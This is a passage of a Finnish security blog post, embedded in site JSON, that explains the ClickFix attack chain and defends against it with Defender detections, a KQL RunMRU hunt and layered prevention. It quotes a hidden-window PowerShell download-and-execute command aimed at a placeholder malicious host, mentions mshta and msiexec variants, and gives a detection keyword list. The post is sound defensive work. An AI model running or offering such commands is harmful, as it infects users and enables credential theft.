[{"data":1,"prerenderedAt":1122},["ShallowReactive",2],{"sc:header-data-fi":3,"sc:footer-data-fi":489,"author-fi-fritz-zurhorst-11e6a2cbe4b79b":519,"content-fi-fritz-zurhorst":543,"content-events-fi-fritz-zurhorst":1106,"authors_data:Fritz Zurhorst|Nadine Klein":1107},{"lang":4,"home":5,"navigation":17,"meta":479,"contact":485},"de",{"name":6,"folderSwitch":7,"imgLight":10,"img":11,"languages":12},"home",[8,9],"authors","blog","/logos/gk-Logo-sw.svg","/logos/gk-Logo-rgb.svg",{"fi":13},{"title":14,"url":15,"alt":16},"Etusivu","/fi","glueckkanja Logo",[18,127,231,316,395,402],{"name":19,"languages":20,"children":24},"workplace",{"fi":21},{"title":22,"description":23},"Workplace","Microsoft 365 -pohjaiset älykkäät, turvalliset ja joustavat työympäristöt, jotka yhdistävät nykyaikaiset teknologiat ja identiteettipalvelut.",[25,55,91],{"name":26,"languages":27,"children":30},"portfolio",{"fi":28},{"title":29},"Portfolio",[31,37,43,49],{"name":32,"languages":33},"managed-intune",{"fi":34},{"title":35,"url":36},"Managed Intune","/fi/entra-intune/managed-intune",{"name":38,"languages":39},"managed-entra",{"fi":40},{"title":41,"url":42},"Managed Entra","/fi/entra-intune/managed-entra",{"name":44,"languages":45},"managed-workplace",{"fi":46},{"title":47,"url":48},"Managed Workplace","/fi/workplace/managed-workplace",{"name":50,"languages":51},"consulting-services",{"fi":52},{"title":53,"url":54},"Consulting Services","/fi/workplace/consulting-services",{"name":56,"languages":57,"children":60},"microsoft-365-endpoint",{"fi":58},{"title":59},"Microsoft 365 Endpoint",[61,67,73,79,85],{"name":62,"languages":63},"microsoft-entra-suite",{"fi":64},{"title":65,"url":66},"Microsoft Entra Suite","/fi/workplace/microsoft-entra-suite",{"name":68,"languages":69},"microsoft-intune",{"fi":70},{"title":71,"url":72},"Microsoft Intune","/fi/workplace/microsoft-intune",{"name":74,"languages":75},"microsoft-windows",{"fi":76},{"title":77,"url":78},"Microsoft Windows","/fi/workplace/microsoft-windows",{"name":80,"languages":81},"windows-365-cloud-pc",{"fi":82},{"title":83,"url":84},"Windows 365 Cloud PC","/fi/workplace/windows365-cloud-pc",{"name":86,"languages":87},"cloud-workplace-foundation",{"fi":88},{"title":89,"url":90},"Cloud Workplace Foundation","/fi/workplace/cloud-workplace-foundation",{"name":92,"languages":93,"children":96},"microsoft-365-collaboration",{"fi":94},{"title":95},"Microsoft 365 Collaboration",[97,103,109,115,121],{"name":98,"languages":99},"microsoft-copilot",{"fi":100},{"title":101,"url":102},"Microsoft 365 Copilot","/fi/workplace/microsoft-365-copilot",{"name":104,"languages":105},"microsoft-teams",{"fi":106},{"title":107,"url":108},"Teams","/fi/workplace/microsoft-teams",{"name":110,"languages":111},"sharepoint-powerplatform",{"fi":112},{"title":113,"url":114},"SharePoint & Power Platform","/fi/workplace/sharepoint-power-platform",{"name":116,"languages":117},"exchange-online",{"fi":118},{"title":119,"url":120},"Exchange Online","/fi/workplace/exchange-online",{"name":122,"languages":123},"information-protection-compliance",{"fi":124},{"title":125,"url":126},"Information Protection & Compliance","/fi/workplace/information-protection-compliance",{"name":128,"languages":129,"children":133},"azure",{"fi":130},{"title":131,"description":132},"Azure","Vauhdita kasvua Azurella: leikkaa pilvikustannuksia, paranna tehokkuutta ja edistä innovaatioita IaaS:n ja PaaS:n avulla.",[134,151,181],{"name":135,"languages":136,"children":138},"azure-portfolio",{"fi":137},{"title":29},[139,145],{"name":140,"languages":141},"azure-managed-services",{"fi":142},{"title":143,"url":144},"Azure Managed Services","/fi/azure/azure-managed-services",{"name":146,"languages":147},"azure-consulting",{"fi":148},{"title":149,"url":150},"Azure Consulting","/fi/azure/azure-consulting",{"name":152,"languages":153,"children":156},"azure-scenarios",{"fi":154},{"title":155},"Skenaariot",[157,163,169,175],{"name":158,"languages":159},"plan-your-cloud",{"fi":160},{"title":161,"url":162},"Suunnittele pilvesi","/fi/azure/plan-your-cloud",{"name":164,"languages":165},"migrate-to-the-cloud",{"fi":166},{"title":167,"url":168},"Siirry pilveen","/fi/azure/migrate-to-the-cloud",{"name":170,"languages":171},"innovate-your-business",{"fi":172},{"title":173,"url":174},"Uudista liiketoimintasi","/fi/azure/innovate-your-business",{"name":176,"languages":177},"vmware-exit",{"fi":178},{"title":179,"url":180},"Mieti VMware-strategiasi uudelleen","/fi/azure/vmware-exit",{"name":182,"languages":183,"children":186},"azure-practices",{"fi":184},{"title":185},"Practices",[187,193,199,202,208,213,219,225],{"name":188,"languages":189},"azure-foundation",{"fi":190},{"title":191,"url":192},"Azure Foundation","/fi/azure/azure-foundation",{"name":194,"languages":195},"azure-ai-foundation",{"fi":196},{"title":197,"url":198},"Azure AI Foundation","/fi/azure/azure-ai-foundation",{"name":86,"languages":200},{"fi":201},{"title":89,"url":90},{"name":203,"languages":204},"azure-data-foundation",{"fi":205},{"title":206,"url":207},"Azure Data Foundation","/fi/azure/azure-data-foundation",{"name":188,"languages":209},{"fi":210},{"title":211,"url":212},"Azure Container Foundation","/fi/azure/azure-container-foundation",{"name":214,"languages":215},"dark-tenant",{"fi":216},{"title":217,"url":218},"Managed Dark Tenant","/fi/azure/managed-dark-tenant",{"name":220,"languages":221},"azure-cloud-adoption-framework",{"fi":222},{"title":223,"url":224},"Cloud Adoption Framework","/fi/azure/cloud-adoption-framework",{"name":226,"languages":227},"azure-cloud-competence-center",{"fi":228},{"title":229,"url":230},"Cloud Competence Center","/fi/azure/cloud-competence-center",{"name":232,"languages":233,"children":242},"security",{"fi":234},{"title":235,"description":236,"emergency":237},"Tietoturva","Valppautta pilvessä palkitulla 24/7-hallintapalvelulla, häiriötilanteiden hallinnalla ja huippuluokan suojauksella infrastruktuurillesi.",{"text":238,"href":239,"skin":240,"icon":241},"Hyökkäyksen kohteena?","/fi/security/are-you-under-attack","primary","emergency",[243,268,289],{"name":244,"children":245},"security-security-consulting",[246,252,256,262],{"name":247,"languages":248},"managed-red-tenant",{"fi":249},{"title":250,"url":251},"Managed Red Tenant","/fi/security/managed-red-tenant",{"name":214,"languages":253},{"fi":254},{"title":255,"url":218},"Dark Tenant",{"name":257,"languages":258},"sentinel-data-lake",{"fi":259},{"title":260,"url":261},"Sentinel Data Lake","/fi/security/sentinel-data-lake",{"name":263,"languages":264},"security-consulting",{"fi":265},{"title":266,"url":267},"Security Consulting","/fi/security/security-consulting",{"name":269,"children":270},"security-cloud-security-operations-center",[271,277,283],{"name":272,"languages":273},"cloud-security-operations-center",{"fi":274},{"title":275,"url":276},"Cloud Security Operations Center","/fi/security/cloud-security-operations-center",{"name":278,"languages":279},"global-secure-access",{"fi":280},{"title":281,"url":282},"Global Secure Access","/fi/security/global-secure-access",{"name":284,"languages":285},"my-work-id",{"fi":286},{"title":287,"url":288},"MyWorkID","/fi/security/my-work-id",{"name":290,"children":291},"security-preventive-services",[292,298,304,310],{"name":293,"languages":294},"preventive-services",{"fi":295},{"title":296,"url":297},"Preventive Services","/fi/security/preventive-services",{"name":299,"languages":300},"data-security-services",{"fi":301},{"title":302,"url":303},"Data Security Service","/fi/security/data-security-service",{"name":305,"languages":306},"security-copilot-agents",{"fi":307},{"title":308,"url":309},"Security Copilot Agents","/fi/security/security-copilot-agents",{"name":311,"languages":312},"nis2",{"fi":313},{"title":314,"url":315},"NIS2:n käyttöönotto","/fi/security/red-dark-tenant-nis2",{"name":317,"languages":318,"children":322},"products",{"fi":319},{"title":320,"description":321},"Tuotteet","Innovatiiviset täydentävät tuotteet täysin turvalliseen, 100-prosenttisesti pilvipohjaiseen Microsoft-ympäristöön, jotka parantavat yhteistyötä, verkon todennusta ja ohjelmistojen hallintaa.",[323,360],{"name":324,"products":325,"children":326},"lorem ipsum 1",true,[327,336,344,352],{"name":328,"img":329,"target":330,"languages":331},"realmjoin","products/realmjoin/realmjoin-nav-logo.svg","_blank",{"fi":332},{"title":333,"url":334,"subtitle":335},"RealmJoin","https://www.realmjoin.com","Pilvipohjainen ohjelmistojen jakelu",{"name":337,"img":338,"target":330,"languages":339},"scepman","products/scepman/scepman-nav-logo.svg",{"fi":340},{"title":341,"url":342,"subtitle":343},"SCEPman","https://www.scepman.com","Varmenteiden jakelu pilvestä",{"name":345,"img":346,"target":330,"languages":347},"konnekt","products/konnekt/konnekt-nav-logo.svg",{"fi":348},{"title":349,"url":350,"subtitle":351},"KONNEKT","https://www.konnekt.io","Työskentele paikallisten Office 365 -tietojesi kanssa",{"name":353,"img":354,"target":330,"languages":355},"realmigrator","products/realmigrator/realmigrator-nav-logo.svg",{"fi":356},{"title":357,"url":358,"subtitle":359},"RealMigrator","https://www.realmigrator.com","Siirrä tietosi palvelimelta toiselle",{"name":361,"products":325,"children":362},"lorem ipsum 2",[363,371,379,387],{"name":364,"img":365,"target":330,"languages":366},"terraprovider","products/terraprovider/terraprovider-nav-logo.svg",{"fi":367},{"title":368,"url":369,"subtitle":370},"TerraProvider","https://www.terraprovider.com","Terraform Provider Microsoft 365:lle",{"name":372,"img":373,"target":330,"languages":374},"radiusaas","products/radius/radius-nav-logo.svg",{"fi":375},{"title":376,"url":377,"subtitle":378},"RADIUSaaS","https://www.radius-as-a-service.com","Todennus verkollesi",{"name":380,"img":381,"target":330,"languages":382},"unifiedcontacts","products/unified-contacts/unifiedcontact-nav-logo.svg",{"fi":383},{"title":384,"url":385,"subtitle":386},"Unified Contacts","https://www.unified-contacts.com","Etsi yhteystietoja Microsoft Teamsista",{"name":388,"img":389,"target":330,"languages":390},"autopilotmonitor","products/autopilot-monitor/AutopilotMonitor-nav-logo.svg",{"fi":391},{"title":392,"url":393,"subtitle":394},"Autopilot Monitor","https://www.autopilotmonitor.com","Windows Autopilot -valvonta reaaliajassa",{"name":396,"languages":397},"casestudies",{"fi":398},{"title":399,"url":400,"description":401},"Asiakastarinat","/fi/casestudies","Pilven edelläkävijä: paras Microsoft-kumppanisi kattaviin pilviratkaisuihin Blueprint-pohjaisella lähestymistavalla ja Infrastructure-as-Code-osaamisella.",{"name":403,"languages":404,"children":407},"company",{"fi":405},{"title":406,"description":401},"Yritys",[408,438,462],{"name":409,"languages":410,"children":413},"company-about-us",{"fi":411},{"title":412},"Tietoa meistä",[414,420,426,432],{"name":415,"languages":416},"company-facts-figures",{"fi":417},{"title":418,"url":419},"Faktat ja luvut","/fi/company/facts-and-figures",{"name":421,"languages":422},"company-contact",{"fi":423},{"title":424,"url":425},"Yhteystiedot ja toimipisteet","/fi/company/contact-and-locations",{"name":427,"languages":428},"switzerland",{"fi":429},{"title":430,"url":431},"glueckkanja Sveitsi","/fi/company/switzerland",{"name":433,"languages":434},"austria",{"fi":435},{"title":436,"url":437},"glueckkanja Itävalta","/fi/company/austria",{"name":439,"languages":440,"children":443},"company-career",{"fi":441},{"title":442},"Ura",[444,450,456],{"name":445,"languages":446},"company-career-overview",{"fi":447},{"title":448,"url":449},"Urakatsaus","/fi/career",{"name":451,"languages":452},"company-young-professionals",{"fi":453},{"title":454,"url":455},"Young Professionals","/fi/young-professionals",{"name":457,"languages":458},"company-jobs",{"fi":459},{"title":460,"url":461},"Avoimet työpaikat","/fi/job-offers",{"name":463,"languages":464,"children":467},"company-latest",{"fi":465},{"title":466},"Uusimmat",[468,474],{"name":469,"languages":470},"company-blog",{"fi":471},{"title":472,"url":473},"Blogi","/fi/blog",{"name":469,"languages":475},{"fi":476},{"title":477,"url":478},"Tapahtumat","/fi/events",[480],{"name":481,"languages":482},"career-meta",{"fi":483},{"title":442,"url":449,"active":484},false,{"languages":486},{"fi":487},{"title":488,"url":425,"active":484},"Yhteystiedot",{"data":490},{"bgColor":491,"number":492,"mail":493,"brandLogos":494,"logos":495,"links":499,"linksFi":509},"var(--color-gk-mid-blue)","+49 69 4005520","info@glueckkanja.com",null,[496],{"img":10,"alt":16,"url":497,"class":498},"index.html","max-w-19rem",[500,503,506],{"title":501,"url":502},"Datenschutz","/de/privacy",{"title":504,"url":505},"Impressum","/de/imprint",{"title":507,"url":508},"No Cookies","/de/cookies",[510,513,516],{"title":511,"url":512},"Tietosuoja","/fi/privacy",{"title":514,"url":515},"Oikeudelliset tiedot","/fi/imprint",{"title":517,"url":518},"Ei evästeitä","/fi/cookies",{"id":520,"title":521,"body":522,"description":528,"extension":533,"meta":534,"name":521,"navigation":325,"otherLanguages":535,"path":539,"seo":540,"stem":541,"__hash__":542},"authors/fritz-zurhorst.md","Fritz Zurhorst",{"type":523,"value":524,"toc":529},"minimal",[525],[526,527,528],"p",{},"Friedemann Zurhorst ist Cyber Security Architect bei glueckkanja. Sein Schwerpunkt liegt auf Identity Security: Er prüft gewachsene Active-Directory-Umgebungen in AD Security Reviews, begleitet Kunden bei der Einführung starker Authentifizierung und klassifiziert Privilegien nach dem Enterprise Access Model, unter anderem in EntraOps-Workshops. Dazu kommen Platform Engineering und die Arbeit am Managed Red Tenant, mit dem glueckkanja Kunden eine sichere administrative Umgebung bereitstellt.",{"title":530,"searchDepth":531,"depth":531,"links":532},"",2,[],"md",{},{"en":536,"es":537,"ja":538},"Friedemann Zurhorst is a Cyber Security Architect at glueckkanja. His focus is identity security. He assesses grown Active Directory environments in AD security reviews, guides customers through the rollout of strong authentication, and classifies privileges along the Enterprise Access Model, among other things in EntraOps workshops. On top of that comes platform engineering as well as work on the Managed Red Tenant, with which glueckkanja provides customers with a secure administrative environment.","Friedemann Zurhorst es Cyber Security Architect en glueckkanja. Su especialidad es la seguridad de identidades. Evalúa entornos de Active Directory que han crecido con los años en AD Security Reviews, acompaña a los clientes en la implantación de una autenticación fuerte y clasifica los privilegios según el Enterprise Access Model, entre otros en los workshops de EntraOps. A ello se suman el platform engineering y el trabajo en el Managed Red Tenant, con el que glueckkanja proporciona a sus clientes un entorno administrativo seguro.","Friedemann Zurhorstは、glueckkanjaのCyber Security Architectです。専門はIdentity Securityで、AD Security Reviewでは長年かけて積み上がったActive Directory環境を点検し、強力な認証の導入をお客様とともに進め、EntraOpsワークショップなどでEnterprise Access Modelに沿って特権を分類しています。あわせてPlatform Engineeringと、glueckkanjaがお客様に安全な管理環境を提供するManaged Red Tenantの開発にも携わっています。","/fritz-zurhorst",{"title":521,"description":528},"fritz-zurhorst","GMLpRIZsG9AhXoKwTKoJSiKYi53_8VC070ybXAUDQK4",[544],{"id":545,"title":546,"author":547,"body":549,"cta":494,"description":530,"eventid":494,"extension":533,"hideInRecent":484,"layout":1058,"meta":1059,"moment":1063,"navigation":325,"path":1098,"seo":1099,"stem":1100,"tags":1101,"webcast":484,"__hash__":1105},"content_fi/posts/2026-09-21-clickfix-prevent-detect.md","ClickFix. Kun käyttäjä on se exploit, ja miten te pysäytätte sen",[521,548],"Nadine Klein",{"type":523,"value":550,"toc":1047},[551,556,559,562,569,577,580,586,589,608,619,625,631,634,638,640,643,646,650,652,655,669,673,675,682,761,778,781,785,787,790,805,808,811,815,817,820,823,848,852,854,857,864,868,870,873,899,902,905,908,1007,1010,1013,1016,1027,1030,1034,1036,1043],[552,553,555],"h2",{"id":554},"clickfix-hyökkäysketju","ClickFix-hyökkäysketju",[526,557,558],{},"{: .h3-font-size}",[526,560,561],{},"ClickFix on hyökkäys, jossa käyttäjistä tulee omia hyökkääjiään. Ei exploitia, ei haavoittuvuutta. Uhri suorittaa haittakoodin itse, yhdellä ainoalla copy-pastella.",[526,563,564],{},[565,566],"img",{"alt":567,"src":568},"ClickFix-hyökkäysketju viidessä vaiheessa: houkutin, temppu, copy-paste, suoritus, infektio.","https://res.cloudinary.com/c4a8/image/upload/blog/pics/click-fix-img-01.png",[526,570,571,572,576],{},"Houkutin on social engineering: väärennetty CAPTCHA haitallisella sivulla, valheellinen tuki-ilmoitus (”selaimesi tarvitsee päivityksen”), phishing-viesti tai väärennetty kokoussivu. Sillä aikaa kun uhri on sivulla, JavaScript kirjoittaa payloadin leikepöydälle ",[573,574,575],"code",{},"clipboard.writeText()","-kutsulla. Sitten sivu kehottaa käyttäjää painamaan Win+R, Ctrl+V ja Enter. Suorita-dialogi käynnistää sen, mikä leikepöydällä on.",[526,578,579],{},"Tyypillinen houkutin näyttää tältä:",[526,581,582],{},[565,583],{"alt":584,"src":585},"Kuvakaappaus väärennetystä CAPTCHA-houkuttimesta, joka kehottaa käyttäjää painamaan Win ja X, sitten liittämään ja suorittamaan komennon Enterillä.","https://res.cloudinary.com/c4a8/image/upload/c_limit,w_1600,f_auto,q_auto/blog/pics/click-fix-img-02.png",[526,587,588],{},"Komento, jonka se asettaa leikepöydälle, näyttää tältä:",[590,591,593],"div",{"style":592},"background: var(--color-bg-grey); border-radius: 6px; padding: 1rem; margin: 0.25rem 0",[594,595,599],"pre",{"className":596,"code":597,"language":598,"meta":530,"style":530},"language-powershell shiki shiki-themes github-light github-dark","powershell.exe -w h iex(irm 'https://malicious[.]tld/payload' -UseBasicParsing)\n","powershell",[573,600,601],{"__ignoreMap":530},[602,603,606],"span",{"class":604,"line":605},"line",1,[602,607,597],{},[526,609,610,611,614,615,618],{},"Kaksi asiaa tapahtuu samanaikaisesti. PowerShell käynnistyy piilotetussa ikkunassa (",[573,612,613],{},"-w h","), ja ",[573,616,617],{},"iex(irm …)"," lataa payloadin ja suorittaa sen suoraan muistissa. Mitään ei päädy levylle, joten signatuuripohjaisella virustorjunnalla ei ole mitään skannattavaa. Toinen vaihe on useimmiten infostealer (Lumma, Vidar, RedLine, StealC), Remote Access Trojan tai ransomware-loader.",[526,620,621,622,624],{},"Sama kuvio Microsoft Defenderin telemetriassa, piilotettu PowerShell käynnistettynä Windows Terminalista, joka suorittaa ",[573,623,617],{},":",[526,626,627],{},[565,628],{"alt":629,"src":630},"Microsoft Defenderin Inspect-record, jossa prosessiketju WindowsTerminal.exe, pwsh.exe ja powershell.exe suorittaa iex(irm …) -komennon.","https://res.cloudinary.com/c4a8/image/upload/c_limit,w_1600,f_auto,q_auto/blog/pics/click-fix-img-03.png",[526,632,633],{},"Miksi tämä toimii niin hyvin: kaikki ajaa käyttäjän kontekstissa, ilman korotettuja oikeuksia. Evästeet, tallennetut salasanat ja istuntotokenit ovat peruskäyttäjän ulottuvilla. Hyökkääjän ei tarvitse eskaloida oikeuksia päästäkseen siihen, minkä perässä hän tuli.",[552,635,637],{"id":636},"mitä-microsoft-defender-havaitsee","Mitä Microsoft Defender havaitsee",[526,639,558],{},[526,641,642],{},"Microsoft on viime kuukausina investoinut paljon ClickFix-tunnistukseen. Jos teidän Defenderinne on terve ja oikein konfiguroitu, saatte natiivit tunnistukset ClickFix-payloadeille. Q2 2025 lähtien MDE julkaisee käyttäytymispohjaisia alerteja otsikoilla kuten ”Suspicious 'ClickFix' behavior detected”, ”Malicious PowerShell command executed via Run dialog” tai ”An active 'Pacalau' malware in a command line was prevented from executing”. Ne laukeavat MDE:n cloud-enginestä prosessiketjun analyysin kautta, rinnakkain AV-tunnistuksen kanssa ja usein pari sekuntia aiemmin.",[526,644,645],{},"Konfiguraatio, joka tekee tämän mahdolliseksi, on kuvattu alempana suorituksen kovennuksen kohdalla.",[552,647,649],{"id":648},"missä-natiivi-tunnistus-tulee-rajoilleen","Missä natiivi tunnistus tulee rajoilleen",[526,651,558],{},[526,653,654],{},"Cloud-pohjaiset ML-signatuurit tarvitsevat aikaa ennen kuin ne laukeavat. Näemme säännöllisesti yli minuutin mittaisen aukon PowerShellin käynnistymisen ja Defender-alertin välillä. Nopeampi payload livahtaa tästä ikkunasta läpi.",[526,656,657,658,660,661,664,665,668],{},"Hyökkääjät myös sopeutuvat nopeasti. Vaihda ",[573,659,598],{}," tilalle ",[573,662,663],{},"mshta http://..."," tai ",[573,666,667],{},"msiexec /i http://...",", molemmat klassisia LOLBineja, niin PowerShell-kohtaiset tunnistukset eivät enää pure.",[552,670,672],{"id":671},"aukon-sulkeminen-runmru-hunt","Aukon sulkeminen: RunMRU-hunt",[526,674,558],{},[526,676,677,678,681],{},"Tämän aukon suljemme Custom Detectioneilla. Lähtökohtana on KQL-kysely rekisteriavaimeen ",[573,679,680],{},"RunMRU",", joka kirjaa jokaisen komennon, jonka käyttäjä kirjoittaa Win+R-dialogiin.",[590,683,684],{"style":592},[594,685,689],{"className":686,"code":687,"language":688,"meta":530,"style":530},"language-kusto shiki shiki-themes github-light github-dark","DeviceRegistryEvents\n| where ActionType =~ \"RegistryValueSet\"\n| where InitiatingProcessFileName =~ \"explorer.exe\"\n| where RegistryKey has @\"\\CurrentVersion\\Explorer\\RunMRU\"\n| where RegistryValueData has \" ✅ \"\n    or (RegistryValueData has_any (\"powershell\", \"mshta\", \"curl\", \"msiexec\", \"^\")\n        and RegistryValueData matches regex \"[\\\\u0400-\\\\u04FF\\\\u0370-\\\\u03FF\\\\u0590-\\\\u05FF\\\\u0600-\\\\u06FF\\\\u0E00-\\\\u0E7F\\\\u2C80-\\\\u2CFF\\\\u13A0-\\\\u13FF\\\\u0530-\\\\u058F\\\\u10A0-\\\\u10FF\\\\u0900-\\\\u097F]\")\n    or (RegistryValueData has \"mshta\" and RegistryValueName !~ \"MRUList\" and RegistryValueData !in~ (\"mshta.exe\\\\1\", \"mshta\\\\1\"))\n    or (RegistryValueData has_any (\"bitsadmin\", \"forfiles\", \"ProxyCommand=\") and RegistryValueName !~ \"MRUList\")\n    or ((RegistryValueData startswith \"cmd\" or RegistryValueData startswith \"powershell\")\n        and (RegistryValueData has_any (\"-W Hidden \", \" -eC \", \"curl\", \"E:jscript\", \"ssh\", \"Invoke-Expression\", \"UtcNow\", \"Floor\", \"DownloadString\", \"DownloadFile\", \"FromBase64String\", \"System.IO.Compression\", \"System.IO.MemoryStream\", \"iex\", \"Invoke-WebRequest\", \"iwr\", \"Get-ADDomainController\", \"InstallProduct\", \"-w h\", \"-X POST\", \"Invoke-RestMethod\", \"-NoP -W\", \".InVOKe\", \"-useb\", \"irm \", \"^\", \"[char]\", \"[scriptblock]\", \"-UserAgent\", \"UseBasicParsing\", \".Content\")\n            or RegistryValueData matches regex @\"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\\s[A-Za-z0-9+/=]{15,}\"))\n","kusto",[573,690,691,696,701,707,713,719,725,731,737,743,749,755],{"__ignoreMap":530},[602,692,693],{"class":604,"line":605},[602,694,695],{},"DeviceRegistryEvents\n",[602,697,698],{"class":604,"line":531},[602,699,700],{},"| where ActionType =~ \"RegistryValueSet\"\n",[602,702,704],{"class":604,"line":703},3,[602,705,706],{},"| where InitiatingProcessFileName =~ \"explorer.exe\"\n",[602,708,710],{"class":604,"line":709},4,[602,711,712],{},"| where RegistryKey has @\"\\CurrentVersion\\Explorer\\RunMRU\"\n",[602,714,716],{"class":604,"line":715},5,[602,717,718],{},"| where RegistryValueData has \" ✅ \"\n",[602,720,722],{"class":604,"line":721},6,[602,723,724],{},"    or (RegistryValueData has_any (\"powershell\", \"mshta\", \"curl\", \"msiexec\", \"^\")\n",[602,726,728],{"class":604,"line":727},7,[602,729,730],{},"        and RegistryValueData matches regex \"[\\\\u0400-\\\\u04FF\\\\u0370-\\\\u03FF\\\\u0590-\\\\u05FF\\\\u0600-\\\\u06FF\\\\u0E00-\\\\u0E7F\\\\u2C80-\\\\u2CFF\\\\u13A0-\\\\u13FF\\\\u0530-\\\\u058F\\\\u10A0-\\\\u10FF\\\\u0900-\\\\u097F]\")\n",[602,732,734],{"class":604,"line":733},8,[602,735,736],{},"    or (RegistryValueData has \"mshta\" and RegistryValueName !~ \"MRUList\" and RegistryValueData !in~ (\"mshta.exe\\\\1\", \"mshta\\\\1\"))\n",[602,738,740],{"class":604,"line":739},9,[602,741,742],{},"    or (RegistryValueData has_any (\"bitsadmin\", \"forfiles\", \"ProxyCommand=\") and RegistryValueName !~ \"MRUList\")\n",[602,744,746],{"class":604,"line":745},10,[602,747,748],{},"    or ((RegistryValueData startswith \"cmd\" or RegistryValueData startswith \"powershell\")\n",[602,750,752],{"class":604,"line":751},11,[602,753,754],{},"        and (RegistryValueData has_any (\"-W Hidden \", \" -eC \", \"curl\", \"E:jscript\", \"ssh\", \"Invoke-Expression\", \"UtcNow\", \"Floor\", \"DownloadString\", \"DownloadFile\", \"FromBase64String\", \"System.IO.Compression\", \"System.IO.MemoryStream\", \"iex\", \"Invoke-WebRequest\", \"iwr\", \"Get-ADDomainController\", \"InstallProduct\", \"-w h\", \"-X POST\", \"Invoke-RestMethod\", \"-NoP -W\", \".InVOKe\", \"-useb\", \"irm \", \"^\", \"[char]\", \"[scriptblock]\", \"-UserAgent\", \"UseBasicParsing\", \".Content\")\n",[602,756,758],{"class":604,"line":757},12,[602,759,760],{},"            or RegistryValueData matches regex @\"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\\s[A-Za-z0-9+/=]{15,}\"))\n",[526,762,763,764,767,768,767,771,767,774,777],{},"Kysely merkitsee jokaisen Win+R-merkinnän, joka näyttää ClickFix-komennolta: PowerShell, mshta, curl tai msiexec yhdessä tyypillisten indikaattorien kuten ",[573,765,766],{},"-w hidden",", ",[573,769,770],{},"iex",[573,772,773],{},"irm",[573,775,776],{},"DownloadString"," tai Base64-koodattujen payloadien kanssa. Se nappaa myös hienovaraiset temput. Vihreän check-emojin, jonka moni väärennetty CAPTCHA-houkutin asettaa komennon eteen. Unicode-merkit kyrillisiltä, arabialaisilta tai thaimaalaisilta alueilta, joilla hyökkääjät naamioivat tekstiä ja kiertävät yksinkertaisia merkkijonosuodattimia. Jos jokin näistä kuvioista ilmestyy Win+R-merkintään, käynnissä on hyvin todennäköisesti ClickFix-hyökkäys.",[526,779,780],{},"CSOC-asiakkaillemme ajamme näitä ja muita Custom Detectioneja sulkeaksemme aukon uusien hyökkäystekniikoiden ja sisäänrakennetun tunnistuksen välillä.",[552,782,784],{"id":783},"suojauslayer-1-toimituksen-estäminen","Suojauslayer 1: toimituksen estäminen",[526,786,558],{},[526,788,789],{},"Nyt preventioon. ClickFix on yleinen ja menestyksekäs, joten yksittäinen suojaus ei riitä. Työskentelemme layereissa, toimituksesta suoritukseen.",[526,791,792,793,796,797,800,801,804],{},"Network Protection estää tunnetut delivery-domainit ja C2-palvelimet kaikilta selaimilta. MDE Web Content Filtering täydentää kategorioilla kuten ”Newly registered domains”, ”Hacking” ja ”Illegal Software”. Network Protection on sisäänrakennettu Windowsiin, mutta kolmannen osapuolen selaimia varten teidän täytyy poistaa QUIC ja ECH käytöstä, koska molemmat salaavat koko yhteyden ja piilottavat kohdedomainin. Poistakaa QUIC käytöstä Chromessa ja Firefoxissa enterprise-policyllä (",[573,794,795],{},"QuicAllowed = Disabled"," Chromessa, ",[573,798,799],{},"network.http.http3.enable = false"," Firefoxissa); ECH:ta varten asetatte Chromessa ",[573,802,803],{},"EncryptedClientHelloEnabled = Disabled",".",[526,806,807],{},"Edgeä varten aktivoitte SmartScreenin. Kolmannen osapuolen selaimissa kytkette päälle niiden sisäänrakennetun Safe Browsingin. Se ei ole sama asia kuin Network Protection, mutta auttaa haitallisten sivujen suodattamisessa. Sähköpostivektorin osalta Safe Links ja Safe Attachments tarkistavat linkit ja liitteet, ennen kuin käyttäjät ovat niiden kanssa tekemisissä.",[526,809,810],{},"Koukku on tässä: kaikki tämä puree vain tunnettuun infrastruktuuriin. Ajankohtaiset ClickFix-kampanjat kulkevat tuoreeltaan rekisteröidyn infrastruktuurin kautta, joka identifioidaan ja estetään liian myöhään, ja joskus legitiimien sivujen kautta, jotka hyökkääjä on kompromentoinut. Katsotaan siis, mikä suojaa sen jälkeen kun houkutin on toimitettu.",[552,812,814],{"id":813},"suojauslayer-2-tempun-estäminen","Suojauslayer 2: tempun estäminen",[526,816,558],{},[526,818,819],{},"Pari Edgen ominaisuutta nostaa kynnystä sillä aikaa kun käyttäjä on haitallisella sivulla. Selainlaajennusten hallinta estää käyttäjiä asentamasta haitallisia tai kompromentoituja laajennuksia, jotka istuttavat ClickFix-overlayta tai manipuloivat itse leikepöytää. Edge Enhanced Security Mode asettaa tiukemmat suojatoimet tuntemattomille ja harvoin vierailluille sivuille (JIT pois käytöstä, Control Flow Guard, laitteistotuettu pinosuojaus), mikä vaikeuttaa exploitpohjaisia selainvaltauksia selvästi. Typo Protection varoittaa typosquatatuista domaineista (micros0ft.com, paypa1.com) ja estää yleisen ClickFix-toimitusvektorin väärennettyjen brändidomainien kautta.",[526,821,822],{},"Tekniset kontrollit ovat vain puoli voittoa. Käyttäjien valistus pysyy ratkaisevana. Se yksi sääntö, joka kantaa suurimman osan: jos verkkosivu kehottaa sinua liittämään jotain koneeseesi, kyseessä on hyökkäys. Tehkää siitä konkreettista awareness-koulutuksessa:",[824,825,827,828,827,836,827,842],"ul",{"style":826},"margin: 0.25rem 0","\n  ",[829,830,831,835],"li",{},[832,833,834],"strong",{},"Näyttäkää oikeita houkuttimia:"," väärennettyjä ”Verify you are human” -valintaruutuja, ”selaimesi tarvitsee päivityksen”, ”dokumenttia ei voitu renderöidä, suorita tämä korjaus”, rikkinäisiä Teams- tai Zoom-audiokehotteita.",[829,837,838,841],{},[832,839,840],{},"Esittäkää leikepöytätemppu:"," näyttäkää, miten sivu ylikirjoittaa leikepöydän hiljaa.",[829,843,844,847],{},[832,845,846],{},"Tehkää ilmoittamisesta helppoa:"," nopeasti ja ilman syyttelyä.",[552,849,851],{"id":850},"suojauslayer-3-toiminnon-estäminen","Suojauslayer 3: toiminnon estäminen",[526,853,558],{},[526,855,856],{},"Tässä on pari tapaa koventaa järjestelmää, eikä yksikään niistä ole takuu. Aloittakaa Suorita-dialogin poistamisesta käytöstä, se poistaa Win+R-sisääntulopisteen. Microsoftin ClickFix-ohjeistus suosittelee sen poistamista käytöstä ”where it isn't necessary”. Se sulkee nimenomaisen Win+R-liitoshyökkäyksen, mutta vaihtoehtoiset käynnistyspinnat jäävät, esimerkiksi Explorerin osoiterivi ja Windows 